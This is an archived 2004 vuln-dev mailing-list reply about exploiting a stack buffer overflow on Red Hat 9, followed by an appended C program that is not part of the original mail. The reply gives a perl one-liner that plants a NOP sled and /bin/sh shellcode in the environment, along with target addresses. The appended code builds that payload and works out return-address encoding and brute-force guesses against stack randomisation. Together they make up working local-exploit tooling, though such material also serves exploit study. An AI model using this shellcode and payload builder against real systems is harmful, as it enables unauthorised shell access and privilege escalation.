Vulnerability Development mailing list archives

Re: Buffer Overflow Help


From: Harry de Grote <rik.bobbaers () cc kuleuven ac be>
Date: Wed, 10 Nov 2004 12:01:24 +0200

On Tuesday 09 November 2004 04:09, eip () tampabay rr com wrote:
<snip>
I am running GCC version 3.2.2 20030222 (Red Hat Linux 3.2.2-5) on a Redhat
9 box kernel 2.4.20-31.9. Am I doing something wrong?

No, you aren't.

but... RH does randomize the stack a little iirc

So, my way of doing stuff, then, is to just brute force it! :)
(you could also return to libc or whatever)

Best way to do it (I think) is: put your shellcode in the env...

export SHELLCODE=`perl -e '{print "\x90"x65000 . 
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"}'`

that should give you some breathing space for where to jump to...

Shellcode starts (on my box) at 0xbfff0027, so everything from there to
0xbffffe00 should do fine...
-- 
harry
aka Rik Bobbaers

K.U.Leuven - LUDIT             -=- Tel: +32 485 52 71 50
Rik.Bobbaers () cc kuleuven ac be -=- http://harry.ulyssis.org

"\x41\x20\x63\x6f\x6d\x70\x75\x74\x65\x72\x20\x77\x69\x74\x68\x6f\x75\x74\x20"
"\x57\x69\x6e\x64\x6f\x77\x73\x20\x69\x73\x20\x6c\x69\x6b\x65\x20\x61\x20\x66"
"\x69\x73\x68\x20\x77\x69\x74\x68\x6f\x75\x74\x20\x61\x20\x62\x69\x63\x79\x63"
"\x6c\x65\x0a\x00"
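The payload and address arithmetic behind the reply above, written out as an added example (this is not code from the mail or its author). It builds the same 65000-byte NOP sled followed by Aleph One's 45-byte /bin/sh shellcode that the perl one-liner exports, checks that the result is NUL-free (anything passed through the environment is a C string and would be cut short at the first 0x00), and tests whether a guessed return address lands inside the sled using the mail's 0xbfff0027 start and 65000-byte length. The brute-force count treats the sled start as unknown within a window [lo, hi); the 64 KiB window used in the usage note is an assumption for illustration, as are the program name mkpayload and all function names.

```c
/*
 * Added example (not from the original mail): NOP-sled-in-the-environment
 * payload builder plus the return-address arithmetic for brute forcing a
 * randomised stack.  0xbfff0027 and 0xbffffe00 are the mail's figures; the
 * randomisation window passed to attempts_needed() is an assumption.
 */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Aleph One's 45-byte Linux/x86 execve("/bin/sh") shellcode, as in the mail. */
static const unsigned char shellcode[] =
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3"
    "\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80"
    "\xe8\xdc\xff\xff\xff/bin/sh";
#define SHELLCODE_LEN (sizeof(shellcode) - 1)   /* exclude the C-string NUL */
#define SLED_LEN 65000u                         /* the mail's "\x90" x 65000 */

static unsigned char payload[SLED_LEN + SHELLCODE_LEN];

/* Fill `payload` with sled_len NOPs followed by the shellcode.
 * Returns the total length, or 0 if sled_len does not fit the buffer. */
size_t build_payload(size_t sled_len)
{
    if (sled_len > SLED_LEN)
        return 0;
    memset(payload, 0x90, sled_len);                  /* 0x90 = x86 NOP */
    memcpy(payload + sled_len, shellcode, SHELLCODE_LEN);
    return sled_len + SHELLCODE_LEN;
}

/* The environment hands the target a C string, so one NUL byte anywhere
 * would silently truncate the payload.  Returns 1 if it is clean. */
int payload_is_nul_free(const unsigned char *buf, size_t len)
{
    return memchr(buf, 0, len) == NULL;
}

/* The sled occupies [sled_start, sled_start + sled_len).  A guess is good
 * only if it lands there; landing past the sled starts execution in the
 * middle of the shellcode's instruction stream and crashes. */
int hits_sled(uint32_t sled_start, size_t sled_len, uint32_t guess)
{
    return guess >= sled_start && guess - sled_start < sled_len;
}

/* Little-endian encoding of the guess, as written over the saved EIP.
 * Returns 0 if any byte is 0x00: a strcpy()-style overflow stops copying at
 * that byte, so a neighbouring address without a NUL should be used instead. */
int encode_ret_addr(uint32_t guess, unsigned char out[4])
{
    int clean = 1;
    for (int i = 0; i < 4; i++) {
        out[i] = (unsigned char)((guess >> (8 * i)) & 0xff); /* LSB first */
        if (out[i] == 0)
            clean = 0;
    }
    return clean;
}

/* Brute-force plan: if randomisation can place the sled start anywhere in
 * [lo, hi), the guesses lo + L, lo + 2L, ... each cover L bytes of
 * uncertainty, so ceil((hi - lo) / L) attempts are guaranteed to hit the
 * sled once.  A longer sled means fewer attempts, hence 65000 NOPs. */
unsigned attempts_needed(uint32_t lo, uint32_t hi, size_t sled_len)
{
    if (hi <= lo || sled_len == 0)
        return 0;
    return (unsigned)(((uint64_t)hi - lo + sled_len - 1) / sled_len);
}

/* The i-th guess (1-based) of that plan. */
uint32_t guess_at(uint32_t lo, size_t sled_len, unsigned i)
{
    return lo + (uint32_t)((uint64_t)i * sled_len);
}

/* Stand-alone use (assumed file name):  export SHELLCODE="$(./mkpayload)" */
int main(void)
{
    size_t len = build_payload(SLED_LEN);
    if (len == 0 || !payload_is_nul_free(payload, len))
        return 1;
    fwrite(payload, 1, len, stdout);
    return 0;
}
```

With the mail's numbers the sled spans 0xbfff0027 to 0xbffffe0e inclusive, so 0xbffffe00 is inside it while 0xbffffe0f (the first shellcode byte) is not. Note that 0xbffffe00 itself ends in a 0x00 byte; if the overflow goes through strcpy(), a guess such as 0xbffffd01 keeps the copy alive. With an assumed 64 KiB window for the sled start, two guesses spaced 65000 bytes apart cover it.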
